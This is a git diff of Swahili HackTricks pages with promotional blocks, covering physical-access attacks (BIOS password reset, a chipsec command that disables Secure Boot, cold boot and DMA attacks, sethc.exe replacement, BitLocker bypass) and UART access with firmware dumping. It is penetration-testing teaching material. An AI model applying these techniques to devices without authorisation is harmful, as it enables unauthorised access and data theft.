* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -2,80 +2,80 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Kurejesha Nenosiri la BIOS na Usalama wa Mfumo
**Kurejesha BIOS** kunaweza kufanikiwa kwa njia kadhaa. Zaidi ya hayo, motherboard nyingi zina **betri** ambayo, ikiondolewa kwa takriban **dakika 30**, itarejesha mipangilio ya BIOS, ikiwa ni pamoja na nenosiri. Kwa njia mbadala, **jumper kwenye motherboard** inaweza kurekebishwa ili kurejesha mipangilio hii kwa kuunganisha pini maalum.
**Kurejesha BIOS** kunaweza kufanikiwa kwa njia kadhaa. Kwenye baadhi ya motherboard kuna **betri** ambayo, ikiondolewa kwa takriban **dakika 30**, itarejesha mipangilio ya BIOS, ikiwa ni pamoja na nenosiri. Vinginevyo, **jumper kwenye motherboard** inaweza kurekebishwa ili kurejesha mipangilio hii kwa kuunganisha pini maalum.
Katika hali ambapo marekebisho ya vifaa sio rahisi au haiwezekani, zana za **programu** zinatoa suluhisho. Kuendesha mfumo kutoka kwenye **CD/USB ya Moja kwa Moja** na usambazaji kama vile **Kali Linux** hutoa ufikiaji wa zana kama **_killCmos_** na **_CmosPWD_**, ambazo zinaweza kusaidia katika kurejesha nenosiri la BIOS.
Katika hali ambapo marekebisho ya vifaa siwezekani au si rahisi, **zana za programu** zinatoa suluhisho. Kuendesha mfumo kutoka kwenye **CD/USB ya Moja kwa Moja** na usambazaji kama **Kali Linux** hutoa ufikivu wa zana kama **_killCmos_** na **_CmosPWD_**, ambazo zinaweza kusaidia katika kurejesha nenosiri la BIOS.
Katika hali ambapo nenosiri la BIOS halijulikani, kuingiza kwa makosa **mara tatu** kwa kawaida kutatokea kosa. Nambari hii inaweza kutumika kwenye tovuti kama [https://bios-pw.org](https://bios-pw.org) ili kupata nenosiri linaloweza kutumiwa.
Katika hali ambapo nenosiri la BIOS halijulikani, kulipiga **mara tatu** kwa kawaida kutasababisha nambari ya kosa. Nambari hii inaweza kutumika kwenye tovuti kama [https://bios-pw.org](https://bios-pw.org) kwa matumaini ya kupata nenosiri linaloweza kutumika.
### Usalama wa UEFI
Kwa mifumo ya kisasa inayotumia **UEFI** badala ya BIOS ya jadi, zana ya **chipsec** inaweza kutumika kuchambua na kurekebisha mipangilio ya UEFI, ikiwa ni pamoja na kulemaza **Secure Boot**. Hii inaweza kufanikiwa kwa kutumia amri ifuatayo:
Kwa mifumo ya kisasa inayotumia **UEFI** badala ya BIOS za jadi, zana **chipsec** inaweza kutumika kuchambua na kurekebisha mipangilio ya UEFI, ikiwa ni pamoja na kulemaza **Secure Boot**. Hii inaweza kufanywa kwa amri ifuatayo:
`python chipsec_main.py -module exploits.secure.boot.pk`
### Uchambuzi wa RAM na Mashambulizi ya Cold Boot
RAM inahifadhi data kwa muda mfupi baada ya umeme kukatwa, kawaida kwa muda wa **dakika 1 hadi 2**. Uhai huu unaweza kuongezwa hadi **dakika 10** kwa kutumia vitu baridi, kama vile nitrojeni ya majimaji. Wakati wa kipindi hiki kirefu, **kumbukumbu ya kumbukumbu** inaweza kuundwa kwa kutumia zana kama **dd.exe** na **volatility** kwa ajili ya uchambuzi.
RAM inahifadhi data kwa muda mfupi baada ya umeme kukatwa, kawaida kwa muda wa **1 hadi 2 dakika**. Uimara huu unaweza kuongezwa hadi **dakika 10** kwa kutumia vitu baridi, kama vile nitrojeni ya majimaji. Wakati wa kipindi hiki kirefu, unaweza kuunda **dumpu ya kumbukumbu** kwa kutumia zana kama **dd.exe** na **volatility** kwa uchambuzi.
### Mashambulizi ya Upatikanaji wa Moja kwa Moja wa Kumbukumbu (DMA)
### Mashambulizi ya Upatikanaji wa Kumbukumbu Moja kwa Moja (DMA)
**INCEPTION** ni zana iliyoundwa kwa ajili ya **udanganyifu wa kumbukumbu ya kimwili** kupitia DMA, inayofaa kwa interfaces kama vile **FireWire** na **Thunderbolt**. Inaruhusu kuepuka taratibu za kuingia kwa kurekebisha kumbukumbu ili kukubali nenosiri lolote. Hata hivyo, haifanyi kazi kwa mifumo ya **Windows 10**.
**INCEPTION** ni zana iliyoundwa kwa **udanganyifu wa kumbukumbu ya mwili** kupitia DMA, inayoweza kutumika kwenye interface kama **FireWire** na **Thunderbolt**. Inaruhusu kupitisha taratibu za kuingia kwa kurekebisha kumbukumbu ili kukubali nenosiri lolote. Hata hivyo, haina ufanisi dhidi ya mifumo ya **Windows 10**.
### CD/USB ya Moja kwa Moja kwa Upatikanaji wa Mfumo
Kubadilisha faili za mfumo kama vile **_sethc.exe_** au **_Utilman.exe_** na nakala ya **_cmd.exe_** inaweza kutoa dirisha la amri na mamlaka ya mfumo. Zana kama **chntpw** zinaweza kutumika kuhariri faili ya **SAM** ya ufungaji wa Windows, kuruhusu mabadiliko ya nenosiri.
Kubadilisha faili za mfumo kama **_sethc.exe_** au **_Utilman.exe_** na nakala ya **_cmd.exe_** inaweza kutoa dirisha la amri lenye mamlaka ya mfumo. Zana kama **chntpw** inaweza kutumika kuhariri faili ya **SAM** ya usanidi wa Windows, kuruhusu mabadiliko ya nenosiri.
**Kon-Boot** ni zana inayorahisisha kuingia kwenye mifumo ya Windows bila kujua nenosiri kwa muda mfupi kwa kurekebisha muda mfupi wa Windows au UEFI. Taarifa zaidi zinaweza kupatikana kwenye [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/).
**Kon-Boot** ni zana inayorahisisha kuingia kwenye mifumo ya Windows bila kujua nenosiri kwa muda kwa kurekebisha muda mfupi wa Windows au UEFI. Taarifa zaidi inaweza kupatikana kwenye [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/).
### Kushughulikia Vipengele vya Usalama vya Windows
#### Vifupisho vya Kuanza na Kurejesha
#### Vielekezo vya Kuanza na Kurejesha
- **Supr**: Fikia mipangilio ya BIOS.
- **Supr**: Kufikia mipangilio ya BIOS.
- **F8**: Ingia kwenye hali ya Kurejesha.
- Kubonyeza **Shift** baada ya bango la Windows kunaweza kuepuka kuingia moja kwa moja.
- Kupiga **Shift** baada ya bendera ya Windows kunaweza kuepuka kuingia moja kwa moja.
#### Vifaa vya BAD USB
Vifaa kama **Rubber Ducky** na **Teensyduino** hutumika kama majukwaa ya kuunda vifaa vya **bad USB**, vinavyoweza kutekeleza malipo yaliyopangwa kabla wakati vinapounganishwa na kompyuta ya lengo.
Vifaa kama **Rubber Ducky** na **Teensyduino** hutumika kama majukwaa ya kuunda vifaa vya **USB mbaya**, vinavyoweza kutekeleza malipo yaliyopangwa mapema wakati vinapounganishwa kwenye kompyuta ya lengo.
#### Nakala ya Kivuli cha Kiasi
Mamlaka ya msimamizi inaruhusu uundaji wa nakala za faili nyeti, ikiwa ni pamoja na faili ya **SAM**, kupitia PowerShell.
### Kuepuka Ufichuzi wa BitLocker
### Kupitisha Ufichaji wa BitLocker
Ufichaji wa BitLocker unaweza kuepukwa ikiwa **nenosiri la urejeshaji** linapatikana ndani ya faili ya kumbukumbu ya kumbukumbu (**MEMORY.DMP**). Zana kama **Elcomsoft Forensic Disk Decryptor** au **Passware Kit Forensic** zinaweza kutumika kwa kusudi hili.
Ufichaji wa BitLocker unaweza kupitishwa ikiwa **nenosiri la urejeshaji** linapatikana ndani ya faili ya dumpu ya kumbukumbu (**MEMORY.DMP**). Zana kama **Elcomsoft Forensic Disk Decryptor** au **Passware Kit Forensic** zinaweza kutumika kwa madhumuni haya.
### Uhandisi wa Jamii kwa Kuongeza Funguo za Urejeshaji
### Uhandisi wa Kijamii kwa Kuongeza Funguo za Uokoaji
Funguo mpya za urejeshaji wa BitLocker zinaweza kuongezwa kupitia mbinu za uhandisi wa jamii, kwa kuwashawishi watumiaji kutekeleza amri ambayo inaongeza funguo mpya za urejeshaji zilizoundwa na sifuri, hivyo kusaidia mchakato wa kufuta ufichaji.
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
Funguo mpya za urejeshaji wa BitLocker zinaweza kuongezwa kupitia mbinu za uhandisi wa kijamii, kuwashawishi watumiaji kutekeleza amri ambayo inaongeza funguo mpya za urejeshaji zilizoundwa na sifuri, hivyo kusahilisha mchakato wa kufichua.

View file

@ -2,52 +2,66 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Taarifa Msingi
UART ni itifaki ya mfululizo, ambayo inamaanisha inahamisha data kati ya vipengele biti moja kwa wakati. Tofauti na itifaki za mawasiliano ya wima hupitisha data kwa wakati mmoja kupitia njia nyingi. Itifaki za mfululizo za kawaida ni pamoja na RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express, na USB.
UART ni itifaki ya mfululizo, ambayo inamaanisha inahamisha data kati ya vipengele biti moja kwa wakati. Tofauti na hilo, itifaki za mawasiliano ya mfululizo hupitisha data kwa wakati mmoja kupitia njia nyingi. Itifaki za mfululizo za kawaida ni pamoja na RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express, na USB.
Kwa ujumla, mstari unashikiliwa juu (kwa thamani ya mantiki 1) wakati UART iko katika hali ya kupumzika. Kisha, kwa kusudi la kuashiria mwanzo wa uhamisho wa data, mtumaji hutoa biti ya kuanza kwa mpokeaji, wakati ambao ishara inashikiliwa chini (kwa thamani ya mantiki 0). Kisha, mtumaji hutoa biti tano hadi nane za data zinazojumuisha ujumbe halisi, ikifuatiwa na biti ya ukaguzi wa makosa na biti moja au mbili za kusimamisha (zenye thamani ya mantiki 1), kulingana na usanidi. Biti ya ukaguzi wa makosa, inayotumiwa kwa ukaguzi wa makosa, mara chache huonekana kwa vitendo. Biti ya kusimamisha (au biti) inaashiria mwisho wa uhamisho.
Kwa ujumla, mstari unashikiliwa juu (kwa thamani ya mantiki 1) wakati UART iko katika hali ya kupumzika. Kisha, kwa kusudi la kuashiria mwanzo wa uhamisho wa data, mtumaji hutoa biti ya kuanza kwa mpokeaji, wakati ambapo ishara inashikiliwa chini (kwa thamani ya mantiki 0). Kisha, mtumaji hutoa biti tano hadi nane za data zinazojumuisha ujumbe halisi, ikifuatiwa na biti ya ukaguzi wa usawa na biti moja au mbili za kusimamisha (zenye thamani ya mantiki 1), kulingana na usanidi. Biti ya usawa, inayotumiwa kwa ukaguzi wa makosa, mara nyingi haionekani katika vitendo. Biti ya kusimamisha (au biti) inaashiria mwisho wa uhamisho.
Tuitie usanidi wa kawaida zaidi 8N1: biti nane za data, hakuna ukaguzi wa makosa, na biti moja ya kusimamisha. Kwa mfano, ikiwa tunataka kutuma herufi C, au 0x43 katika ASCII, katika usanidi wa UART wa 8N1, tungepeleka biti zifuatazo: 0 (biti ya kuanza); 0, 1, 0, 0, 0, 0, 1, 1 (thamani ya 0x43 katika tarakilishi), na 0 (biti ya kusimamisha).
Tuitie usanidi wa kawaida zaidi 8N1: biti nane za data, hakuna usawa, na biti moja ya kusimamisha. Kwa mfano, ikiwa tunataka kutuma herufi C, au 0x43 katika ASCII, katika usanidi wa UART wa 8N1, tungepeleka biti zifuatazo: 0 (biti ya kuanza); 0, 1, 0, 0, 0, 0, 1, 1 (thamani ya 0x43 kwa nambari ya binary), na 0 (biti ya kusimamisha).
![](<../../.gitbook/assets/image (761).png>)
Vyombo vya vifaa vya mawasiliano na UART:
Vyombo vya vifaa vya kuwasiliana na UART:
* Kigeuzi cha USB-kwa-mfululizo
* Vigeuzi vyenye chips za CP2102 au PL2303
* Zana ya aina nyingi kama: Pirate ya Bus, Adafruit FT232H, Shikra, au Bajeti ya Attify
* Zana ya matumizi mengi kama: Bus Pirate, Adafruit FT232H, Shikra, au Attify Badge
### Kutambua Bandari za UART
UART ina bandari 4: **TX**(Tuma), **RX**(Pokea), **Vcc**(Voltage), na **GND**(Ground). Unaweza kupata bandari 4 zenye herufi za **`TX`** na **`RX`** **zilizoandikwa** kwenye PCB. Lakini ikiwa hakuna ishara, unaweza kuhitaji kujaribu kuzipata mwenyewe kwa kutumia **multimeter** au **analyzer ya mantiki**.
UART ina bandari 4: **TX**(Tuma), **RX**(Pokea), **Vcc**(Voltage), na **GND**(Ground). Unaweza kupata bandari 4 zenye herufi za **`TX`** na **`RX`** **zilizoandikwa** kwenye PCB. Lakini ikiwa hakuna ishara, unaweza kuhitaji kujaribu kuzipata mwenyewe kwa kutumia **multimeter** au **logic analyzer**.
Kwa **multimeter** na kifaa kimezimwa:
* Kutambua pin ya **GND** tumia mode ya **Majaribio ya Uendelezaji**, weka kamba ya nyuma kwenye ardhi na jaribu na ile nyekundu mpaka usikie sauti kutoka kwa multimeter. Pins kadhaa za GND zinaweza kupatikana kwenye PCB, kwa hivyo unaweza kuwa umepata au hujapata ile inayomilikiwa na UART.
* Kutambua **bandari ya VCC**, weka mode ya **volts ya DC** na iweke hadi 20 V ya voltage. Kamba nyeusi kwenye ardhi na kamba nyekundu kwenye pin. Washa kifaa. Ikiwa multimeter inapima voltage ya kudumu ya 3.3 V au 5 V, umepata pin ya Vcc. Ikiwa unapata voltages nyingine, jaribu tena na bandari zingine.
* Kutambua **TX** **bandari**, **mode ya voltage ya DC** hadi 20 V ya voltage, kamba nyeusi kwenye ardhi, na kamba nyekundu kwenye pin, na uweke kifaa. Ikiwa unagundua voltage inabadilika kwa sekunde chache na kisha inadhibitika kwa thamani ya Vcc, labda umepata bandari ya TX. Hii ni kwa sababu wakati wa kuwasha, inatuma data fulani ya uchunguzi.
* **Bandari ya RX** itakuwa ile karibu zaidi na zingine 3, ina mabadiliko madogo ya voltage na thamani ya chini zaidi ya jumla ya pini zote za UART.
* Kutambua pin ya **GND** tumia mode ya **Continuity Test**, weka kichwa cha nyuma kwenye ardhi na jaribu na kichwa chekundu mpaka usikie sauti kutoka kwa multimeter. Pins kadhaa za GND zinaweza kupatikana kwenye PCB, kwa hivyo unaweza kuwa umepata au hujapata ile inayomilikiwa na UART.
* Kutambua **bandari ya VCC**, weka mode ya **DC voltage** na iweke hadi 20 V ya voltage. Kichwa cheusi kwenye ardhi na kichwa chekundu kwenye pin. Washa kifaa. Ikiwa multimeter inapima voltage thabiti ya 3.3 V au 5 V, umepata pin ya Vcc. Ikiwa unapata voltages nyingine, jaribu tena na bandari zingine.
* Kutambua **TX** **port**, **DC voltage mode** hadi 20 V ya voltage, kichwa cheusi kwenye ardhi, na kichwa chekundu kwenye pin, na uweke kifaa. Ikiwa unagundua voltage inabadilika kwa sekunde chache na kisha inadhibitika kwa thamani ya Vcc, labda umepata TX port. Hii ni kwa sababu ya kutuma data ya uchunguzi wakati wa kuwasha.
* **RX port** itakuwa ile karibu zaidi na zingine 3, ina mabadiliko madogo ya voltage na thamani ya chini zaidi ya jumla ya pini zote za UART.
Unaweza kuchanganya bandari za TX na RX na hakuna kitakachotokea, lakini ikiwa unachanganya GND na bandari ya VCC unaweza kuharibu mzunguko.
Unaweza kuchanganya pini za TX na RX na hakuna kitakachotokea, lakini ikiwa unachanganya GND na bandari ya VCC unaweza kuharibu mzunguko.
Kwenye vifaa vya lengo fulani, bandari ya UART inaweza kuwa imelemazwa na mtengenezaji kwa kulemaza RX au TX au hata zote mbili. Katika kesi hiyo, inaweza kuwa na manufaa kufuatilia mawasiliano kwenye bodi ya mzunguko na kupata sehemu ya kuvunja. Kiashiria kikali kuhusu kuthibitisha kutokuwepo kwa kugundua UART na kuvunjika kwa mzunguko ni kuangalia dhamana ya kifaa. Ikiwa kifaa kimesafirishwa na dhamana fulani, mtengenezaji huacha vipengele vya uchunguzi (katika kesi hii, UART) na hivyo, lazima awe amekataza UART na ataiunganisha tena wakati wa kutatua hitilafu. Pins hizi za kuvunja zinaweza kuunganishwa kwa kusodolewa au nyaya za jumper.
Kwenye vifaa vingine vya lengo, bandari ya UART inaweza kuwa imelemazwa na mtengenezaji kwa kulemaza RX au TX au hata zote mbili. Katika kesi hiyo, inaweza kuwa na manufaa kufuatilia mawasiliano kwenye bodi ya mzunguko na kupata sehemu ya kuvunja. Kiashiria kikali cha kuthibitisha kutokuwepo kwa kugundua UART na kuvunja kwa mzunguko ni kuangalia dhamana ya kifaa. Ikiwa kifaa kimepelekwa na dhamana fulani, mtengenezaji huacha interfaces za uchunguzi (katika kesi hii, UART) na hivyo, lazima awe ameunganisha UART na ataiunganisha tena wakati wa kutatua hitilafu. Pins hizi za kuvunja zinaweza kuunganishwa kwa kusodolewa au nyaya za jumper.
### Kutambua Kiwango cha Baud ya UART
Njia rahisi ya kutambua kiwango sahihi cha baud ni kuangalia **matokeo ya pin ya TX na kujaribu kusoma data**. Ikiwa data unayopokea haiwezi kusomwa, badilisha kiwango cha baud kinachowezekana hadi data iweze kusomwa. Unaweza kutumia kigeuzi cha USB-kwa-mfululizo au kifaa cha aina nyingi kama Bus Pirate kufanya hivi, pamoja na script msaidizi, kama [baudrate.py](https://github.com/devttys0/baudrate/). Viwango vya baud vya kawaida ni 9600, 38400, 19200, 57600, na 115200.
Njia rahisi ya kutambua baud rate sahihi ni kutazama **pato la pin ya TX na kujaribu kusoma data**. Ikiwa data unayopokea haiwezi kusomwa, badilisha kwa baud rate inayofuata hadi data iweze kusomwa. Unaweza kutumia kigeuzi cha USB-kwa-mfululizo au kifaa cha matumizi mengi kama Bus Pirate kufanya hivi, pamoja na script msaidizi, kama vile [baudrate.py](https://github.com/devttys0/baudrate/). Viwango vya baud vya kawaida ni 9600, 38400, 19200, 57600, na 115200.
{% hint style="danger" %}
Ni muhimu kutambua kwamba katika itifaki hii unahitaji kuunganisha TX ya kifaa kimoja na RX ya kingine!
@ -73,15 +87,15 @@ minicom -s
```
Configure mazingira kama baudrate na jina la kifaa katika chaguo la `Serial port setup`.
Baada ya usanidi, tumia amri `minicom` kuanza kupata Konsoli ya UART.
Baada ya usanidi, tumia amri `minicom` kuanza kupata Konzi ya UART.
## UART Kupitia Arduino UNO R3 (Makaratasi ya Chip ya Atmel 328p yanayoweza kuondolewa)
Ikiwa viunganishi vya UART Serial hadi USB havipatikani, Arduino UNO R3 inaweza kutumika na udukuzi wa haraka. Kwa kuwa Arduino UNO R3 kawaida inapatikana mahali popote, hii inaweza kuokoa muda mwingi.
Ikiwa viunganishi vya UART Serial hadi USB havipatikani, Arduino UNO R3 inaweza kutumika na udukuzi wa haraka. Kwa kuwa Arduino UNO R3 kawaida inapatikana popote, hii inaweza kuokoa muda mwingi.
Arduino UNO R3 ina adapta ya USB hadi Serial iliyojengwa kwenye bodi yenyewe. Ili kupata uunganisho wa UART, tuvute nje chipu ya mikrokontrola ya Atmel 328p kutoka kwenye bodi. Udukuzi huu unafanya kazi kwenye toleo la Arduino UNO R3 lenye Atmel 328p ambayo haijasuluhishwa kwenye bodi (toleo la SMD linatumika ndani yake). Unganisha pin ya RX ya Arduino (Pin ya Dijitali 0) kwenye pin ya TX ya Kiolesura cha UART na pin ya TX ya Arduino (Pin ya Dijitali 1) kwenye pin ya RX ya kiolesura cha UART.
Arduino UNO R3 ina kiunganishi cha USB hadi Serial kilichojengwa kwenye bodi yenyewe. Ili kupata uunganisho wa UART, tuvute nje chipu ya mikrokontrola ya Atmel 328p kutoka kwenye bodi. Udukuzi huu unafanya kazi kwenye toleo la Arduino UNO R3 lenye Atmel 328p ambayo haijasindikwa kwenye bodi (toleo la SMD linatumika). Unganisha pin ya RX ya Arduino (Pin ya Dijitali 0) kwenye pin ya TX ya Kiolesura cha UART na pin ya TX ya Arduino (Pin ya Dijitali 1) kwenye pin ya RX ya kiolesura cha UART.
Hatimaye, inapendekezwa kutumia Arduino IDE kupata Konsoli ya Serial. Katika sehemu ya `zana` kwenye menyu, chagua chaguo la `Konsoli ya Serial` na weka kiwango cha baud kulingana na kiolesura cha UART.
Hatimaye, inashauriwa kutumia Arduino IDE kupata Konzi ya Serial. Katika sehemu ya `zana` kwenye menyu, chagua chaguo la `Serial Console` na weka kiwango cha baud kulingana na kiolesura cha UART.
## Bus Pirate
@ -159,13 +173,13 @@ waiting a few secs to repeat....
```
## Kudondosha Firmware na Konsoli ya UART
Konsoli ya UART hutoa njia nzuri ya kufanya kazi na firmware ya msingi katika mazingira ya runtime. Lakini wakati ufikiaji wa Konsoli ya UART ni wa kusoma tu, inaweza kuleta vizuizi vingi. Katika vifaa vingi vilivyowekwa, firmware hufungwa katika EEPROMs na kutekelezwa kwenye processors zenye kumbukumbu ya muda. Hivyo, firmware inabaki kuwa ya kusoma tu tangu firmware ya awali wakati wa utengenezaji iko ndani ya EEPROM yenyewe na faili mpya zingepotea kutokana na kumbukumbu ya muda. Hivyo, kudondosha firmware ni juhudi muhimu wakati wa kufanya kazi na firmware zilizowekwa.
Konsoli ya UART hutoa njia nzuri ya kufanya kazi na firmware ya msingi katika mazingira ya runtime. Lakini wakati upatikanaji wa Konsoli ya UART ni wa kusoma tu, inaweza kuleta vizuizi vingi. Katika vifaa vingi vilivyowekwa, firmware hufungwa katika EEPROMs na kutekelezwa kwenye processors zenye kumbukumbu ya muda mfupi. Hivyo, firmware inabaki kuwa ya kusoma tu tangu firmware ya awali wakati wa utengenezaji iko ndani ya EEPROM yenyewe na faili mpya zingepotea kutokana na kumbukumbu ya muda mfupi. Hivyo, kudondosha firmware ni juhudi muhimu wakati wa kufanya kazi na firmware zilizowekwa.
Kuna njia nyingi za kufanya hivi na sehemu ya SPI inashughulikia njia za kutoa firmware moja kwa moja kutoka kwenye EEPROM na vifaa mbalimbali. Ingawa, inapendekezwa kujaribu kwanza kudondosha firmware na UART kwani kudondosha firmware na vifaa vya kimwili na mwingiliano wa nje kunaweza kuwa hatari.
Kudondosha firmware kutoka kwenye Konsoli ya UART kunahitaji kupata ufikiaji wa bootloaders kwanza. Wauzaji maarufu wengi hutumia <b>uboot</b> (Universal Bootloader) kama bootloader yao ya kupakia Linux. Hivyo, kupata ufikiaji wa <b>uboot</b> ni lazima.
Kudondosha firmware kutoka kwenye Konsoli ya UART kunahitaji kupata kwanza upatikanaji wa bootloaders. Wauzaji maarufu wengi hutumia <b>uboot</b> (Universal Bootloader) kama bootloader yao ya kupakia Linux. Hivyo, kupata upatikanaji wa <b>uboot</b> ni lazima.
Ili kupata ufikiaji wa bootloader ya <b>boot</b>, unganisha bandari ya UART kwenye kompyuta na tumia mojawapo ya zana za Konsoli ya Serial na weka ugavi wa umeme kwa kifaa ukiwa umekatwa. Mara tu usanidi uko tayari, bonyeza Kitufe cha Kuingia na kishike. Hatimaye, unganisha ugavi wa umeme kwa kifaa na ruhusu ianze.
Ili kupata upatikanaji wa bootloader ya <b>boot</b>, unganisha bandari ya UART kwenye kompyuta na tumia mojawapo ya zana za Konsoli ya Serial na weka ugavi wa umeme kwa kifaa kimekatwa. Mara tu usanidi uko tayari, bonyeza Kitufe cha Kuingia na kishike. Hatimaye, unganisha ugavi wa umeme kwa kifaa na ruhusu ianze.
